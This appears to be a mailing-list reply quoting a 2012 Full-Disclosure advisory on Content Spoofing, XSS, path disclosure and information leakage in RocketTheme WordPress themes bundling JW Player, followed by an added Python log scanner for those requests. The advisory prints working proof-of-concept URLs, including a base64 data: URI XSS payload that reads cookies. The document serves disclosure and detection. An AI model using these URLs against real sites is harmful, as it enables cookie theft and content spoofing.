Full path disclosure, vulnerability? Ahahahahaha, good joke! You made my day.
2012/12/29 MustLive <mustl...@websecurity.com.ua>
> Hello list!
>
> Earlier I've written to the list about multiple vulnerabilities in multiple
> themes for WordPress (http://seclists.org/fulldisclosure/2012/Dec/236). In
> that letter I've mentioned 16 themes by RocketTheme (with Rokbox):
> Afterburner, Refraction, Solarsentinel, Mixxmag, Iridium, Infuse,
> Perihelion, Replicant2, Affinity, Nexus, Sentinel, Mynxx Vestnikp, Mynxx,
> Moxy, Terrantribune, Meridian.
>
> I've written about 14 themes + 2 variations of 2 themes by these developers,
> but they have 47 themes for WordPress in total. Among them only three are
> free, and all other themes from RocketTheme are paid ones (it is necessary
> to buy a subscription to the club to receive access to them). And Rokbox is
> bundled with all these themes, except Grunge, which has all
> earlier-mentioned vulnerabilities.
>
> So I inform you about multiple vulnerabilities in 33 new themes for
> WordPress, which are developed by RocketTheme (Rokbox's developers). These
> are Content Spoofing, Cross-Site Scripting, Full path disclosure and
> Information Leakage vulnerabilities.
>
> -------------------------
> Affected products:
> -------------------------
>
> In these 32 themes (in addition to the previous 16) there are Cross-Site
> Scripting, Content Spoofing, Full path disclosure and Information Leakage
> vulnerabilities. And the Grunge theme has FPD holes.
>
> These are the next themes by RocketTheme: Voxel, Diametric, Ionosphere,
> Clarion, Halcyon, Visage, Enigma, Momentum, Radiance, Camber, Reflex,
> Modulus, Nebulae, Entropy, Tachyon, Mercado, Maelstrom, Syndicate, Paradox,
> Hybrid, Omnicron, Zephyr, Panacea, Somaxiom, Juxta, Quantive, Crystalline,
> Kinetic, Dominion, Reaction, Akiraka, Novus and Grunge.
>
> All versions of these themes for WordPress are affected.
>
> Since August I've informed the developers many times concerning
> vulnerabilities in Rokbox and their themes with it.
>
> ----------
> Details:
> ----------
>
> Content Spoofing (WASC-12):
>
> In the parameter file, both video and audio files can be set.
>
> The swf-file of JW Player accepts arbitrary addresses in the parameters file
> and image, which allows spoofing of the flash content, i.e. by setting
> addresses of video (audio) and/or image files from another site.
>
> http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
> http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg
>
> Content Spoofing (WASC-12):
>
> The swf-file of JW Player accepts arbitrary addresses in the parameter config,
> which allows spoofing of the flash content, i.e. by setting the address of a
> config file from another site (the parameters file and image in the xml-file
> accept arbitrary addresses). For loading of a config file from another site
> it needs to have crossdomain.xml.
>
> http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?config=1.xml
>
> 1.xml
>
> <config>
> <file>1.flv</file>
> <image>1.jpg</image>
> </config>
>
> Content Spoofing (WASC-12):
>
> http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site
>
> XSS (WASC-08):
>
> http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
>
> Full path disclosure (WASC-13):
>
> In all these themes there is FPD in index.php
> (http://site/wordpress/wp-content/themes/rt_novus_wp/ and the same for other
> themes), which works at default PHP settings. Also potentially there are FPD
> in other php-files of these themes.
>
> Information Leakage (WASC-13):
>
> In some themes, similar to rt_mixxmag_wp, there can be an error log with full
> paths.
>
> http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
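For anyone triaging the quoted report on their own WordPress install, here is an added example (my code, not part of this thread or of RocketTheme's software) that runs a few detection rules over web-server access-log lines for the request shapes described above: jwplayer.swf with file/image/config pointing at a foreign host, an aboutlink using a non-http scheme, and fetches of the Rokbox error_log. The host name `site`, the log lines and the rule names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# jwplayer.swf parameters that the player loads as media/config; an absolute
# URL on a foreign host means the embed is being pointed at third-party content.
MEDIA_PARAMS = ("file", "image", "config")
SAFE_LINK_SCHEMES = ("http", "https")

def assess_request(host, path, query):
    """Return (category, detail) findings for one request against the site's host."""
    findings = []
    if path.endswith("/js/rokbox/error_log"):          # Information Leakage
        findings.append(("info-leak", "Rokbox error_log fetched"))
    if not path.endswith("/jwplayer.swf"):
        return findings
    params = parse_qs(query, keep_blank_values=True)
    for name in MEDIA_PARAMS:                           # Content Spoofing
        for value in params.get(name, []):
            parts = urlsplit(value)
            if parts.netloc and parts.netloc.lower() != host.lower():
                findings.append(("content-spoofing", f"{name} loads from {parts.netloc}"))
    for value in params.get("aboutlink", []):           # XSS via data:/javascript: link
        scheme = urlsplit(value).scheme.lower()
        if scheme and scheme not in SAFE_LINK_SCHEMES:
            findings.append(("xss", f"aboutlink uses {scheme}: scheme"))
    return findings

# Constructed Apache-style access log lines (hypothetical host "site").
SAMPLE_LOG = [
    '10.0.0.1 - - [29/Dec/2012:10:00:00 +0000] "GET /wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg HTTP/1.1" 200 512',
    '10.0.0.2 - - [29/Dec/2012:10:00:01 +0000] "GET /wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?file=http://other.example/1.flv HTTP/1.1" 200 512',
    '10.0.0.3 - - [29/Dec/2012:10:00:02 +0000] "GET /wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,AAAA HTTP/1.1" 200 512',
    '10.0.0.4 - - [29/Dec/2012:10:00:03 +0000] "GET /wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log HTTP/1.1" 200 2048',
]
LOG_LINE = re.compile(r'"GET (?P<target>\S+) HTTP/[\d.]+"')

def scan_access_log(lines, host="site"):
    """Return [(request target, findings)] for every log line that trips a rule."""
    hits = []
    for line in lines:
        m = LOG_LINE.search(line)
        if not m:
            continue
        target = m.group("target")
        parts = urlsplit(target)
        findings = assess_request(host, parts.path, parts.query)
        if findings:
            hits.append((target, findings))
    return hits
```

The first sample line (local file and image) is the benign baseline and produces no finding; only the three abusive shapes are reported.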